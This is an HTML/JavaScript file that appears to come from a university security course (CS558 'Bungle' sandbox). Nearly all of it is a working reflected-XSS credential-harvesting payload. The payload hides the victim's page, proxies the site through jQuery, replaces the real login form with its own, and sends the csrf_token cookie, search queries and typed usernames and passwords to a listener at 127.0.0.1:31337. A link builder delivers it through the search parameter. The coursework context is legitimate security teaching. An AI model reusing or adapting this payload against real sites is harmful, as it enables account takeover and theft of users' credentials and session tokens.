  1. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  2. <script>
  3.  
  // Credential-harvesting XSS "proxy" payload written for the CS558 "Bungle"
  // sandbox (site http://cs558web.bu.edu/project2/, exfil host 127.0.0.1:31337).
  // Once it executes inside the victim's page it hides the document, re-fetches
  // the site's own pages with jQuery .load() (same origin, so session cookies
  // ride along), rewires links/buttons so navigation stays under this script,
  // swaps in its own login form, and reports the csrf_token cookie, search
  // terms and any typed username/password to `attacker` via GET query strings.
  // The injected script is only payload.toString() plus a call (see makeLink),
  // so it relies on `$` (jQuery) already being present on the target page.
  // NOTE(review): course-sandbox payload — keep it pointed at the sandbox.
  // Defensive takeaways supported by the code: the delivery vector is the
  // reflected `q` search parameter, the token is read from document.cookie,
  // and every exfiltration is a cross-origin XHR GET to one fixed host.
  function payload(attacker) {
    // Defined but never invoked anywhere in this payload.
    function log(data) {
      console.log($.param(data))
      $.get(attacker, data);
    }
    // Fetch `href` from the same origin, render it in place of the current
    // document, then re-hook the controls and exfiltrate whatever was found.
    function proxy(href) {
      $("html").load(href, function(){
        $("html").show();
        // On result pages, hide any anchor whose resolved href contains
        // "script" — presumably the entry that carries this payload's URL
        // (its percent-encoded <script> tag still contains "script").
        if (href.includes("search?")){
          for(var i=0; i<document.getElementsByTagName('a').length;i++){
            if (document.getElementsByTagName('a')[i].href.includes('script')){
              document.getElementsByTagName('a')[i].style.display='none';}}
        }
        // Extract csrf_token from document.cookie. The cookie string is
        // URL-encoded first, so "; " becomes %3B%20 and "=" becomes %3D.
        var x= encodeURIComponent(document.cookie);var y= x.split('%3B%20');
        for(var i=0; i<y.length; i++){if(y[i].split('%3D')[0]=='csrf_token')
          {
            var token_cookie=y[i].split('%3D')[1];
          }
        }
        // `token_cookie` is hoisted and only assigned when the cookie exists;
        // without a csrf_token cookie this encodes the string "undefined".
        var token= encodeURIComponent(token_cookie);
        // Shadows payload's `attacker` parameter for the rest of this callback.
        var attacker = "http://127.0.0.1:31337/";
        $.get(attacker, "The csrf_token: "+token);
        // Show the proxied URL in the address bar; re-proxy on back/forward.
        history.pushState(null, null, href);
        var old=window.location.href;
        window.onpopstate = function(event) {if(old!=window.location.href){proxy(window.location.href)}}
        // --- Replacement handlers wired onto the site's own controls below ---
        function home(){
          $.get(attacker, "The user is going to home");
          proxy("./");
        }
        function search(){
          var q=document.getElementById('query').value;
          $.get(attacker, "The user is searching: "+q);
          proxy("./search?q="+q);
        }
        // Performs the real login (with the harvested csrf_token) so the
        // victim sees normal behaviour, then reports the typed credentials.
        function login(){
          var username=document.getElementById('username').value;
          var password=document.getElementById('userpass').value;
          $.ajax({
            type: 'POST',
            url: 'http://cs558web.bu.edu/project2/login',
            crossDomain: true,
            data: {csrf_token:token,username: username, password: password },
            cache: false,
            success: function(data) {
            }
          });
          // Sent regardless of whether the POST above succeeded.
          $.get(attacker, "The user is logged in with username: "+username+"and password: "+password);
          proxy("./");
        }
        // Only returns home once the real logout POST has succeeded.
        function logout(){
          $.get(attacker, "The user is loging out");
          $.ajax({
            type: 'POST',
            url: 'http://cs558web.bu.edu/project2/logout',
            crossDomain: true,
            data: {csrf_token:token},
            cache: false,
            success: function(data) {
              proxy("./");
            }
          });
        }
        // Account creation is posted without a csrf_token, unlike login/logout.
        function create(){
          var username=document.getElementById('username').value;
          var password=document.getElementById('userpass').value;
          $.post('http://cs558web.bu.edu/project2/create', { username: username, password: password } );
          $.get(attacker, "The user is creating a user with username: "+username+"and password: "+password);
          proxy("./");
        }
        // On non-search pages with nobody logged in, drop the third <form>
        // and replace the thirteenth <div> with this script's own login form,
        // whose buttons are hooked to login()/create() below. Index-based,
        // so it depends on the sandbox's exact markup.
        if (href.includes("search?")==false){
          if(document.getElementById('log-out-btn')==null){
            document.getElementsByTagName('form')[2].replaceWith('');
            document.getElementsByTagName('div')[12].innerHTML='<span class="form-inline"><p>Log in or create an account.</p><div class="form-group form-space"><input id="username" name="username" type="text" placeholder="Username" required class="form-control"></div><div class="form-group form-space"><input id="userpass" name="password" type="password" placeholder="Password" required class="form-control"></div><div class="form-group form-more-space"><button id="log-in-btn" class="btn btn-default">Login</button><button id="new-account-btn" class="btn btn-default">Create Account</button></div></span>'
          }
        }
        // Strip the real hrefs and route clicks through the handlers above.
        // `.type = '#'` is presumably meant to neutralise the native submit;
        // NOTE(review): an unrecognised button type is not a disabling state
        // in HTML — confirm the behaviour in the target browser.
        if(document.getElementById('search-again-btn')!=null){
          document.getElementById('search-again-btn').removeAttribute('href');
          document.getElementById('search-again-btn').addEventListener('click', function() {home();}); }
        if(document.getElementById('bungle-lnk')!=null){
          document.getElementById('bungle-lnk').removeAttribute('href');
          document.getElementById('bungle-lnk').addEventListener('click', function() {home();})}
        if(document.getElementById('log-out-btn')!=null){
          document.getElementById('log-out-btn').type = '#';
          document.getElementById('log-out-btn').addEventListener('click', function() {logout();});}
        if(document.getElementById('search-btn')!=null){
          document.getElementById('search-btn').type = '#';
          document.getElementById('search-btn').addEventListener('click', function() {search();});}
        if(document.getElementById('log-in-btn')!=null){
          document.getElementById('log-in-btn').addEventListener('click', function() {login();});}
        if(document.getElementById('new-account-btn')!=null){
          document.getElementById('new-account-btn').addEventListener('click', function() {create();});
        }
      });
    }
    // Blank the page until the first proxied copy of "./" has loaded.
    $("html").hide();
    proxy("./");
  }
  110.    
  111.    
  /**
   * Build the URL that delivers `payload` through Bungle's reflected search
   * parameter: the serialised function plus a call to it are wrapped in a
   * <script> element and percent-encoded into `q`.
   *
   * Only the undefended case (xssdefense == 0) is implemented. Every other
   * level returns undefined; bypasses for the sandbox's defenses are
   * intentionally not provided here.
   *
   * @param {number} xssdefense - defense level the sandbox should apply
   * @param {string} target     - base URL of the sandbox site
   * @param {string} attacker   - URL the payload will report to
   * @returns {string|undefined} the crafted link, or undefined unless xssdefense == 0
   */
  function makeLink(xssdefense, target, attacker) {
    // Loose equality kept on purpose so a string "0" is treated like 0.
    if (xssdefense != 0) {
      // Implement code to defeat XSS defenses here.
      return undefined;
    }
    // The tags are split so this source can itself live inside a <script>.
    const openTag = "<script" + ">";
    const closeTag = "</script" + ">";
    const injected =
      openTag + payload.toString() + ";payload(\"" + attacker + "\");" + closeTag;
    const query = "./search?xssdefense=" + String(xssdefense) + "&q=";
    return target + query + encodeURIComponent(injected);
  }
  // Attacker-side bootstrap: once the DOM is ready, render a "Try Bungle!"
  // link (opening in the "run" browsing context) whose href carries the
  // payload produced by makeLink for the configured defense level.
  // NOTE(review): makeLink yields undefined for any non-zero level, so the
  // rendered href then literally reads "undefined".
  var xssdefense = 0;
  var target = "http://cs558web.bu.edu/project2/";
  var attacker = "http://127.0.0.1:31337/";
  $(document).ready(function () {
    var url = makeLink(xssdefense, target, attacker);
    var anchor = `<a target="run" href="${url}">Try Bungle!</a>`;
    $("h3").html(anchor);
  });
  128. </script> <h3></h3>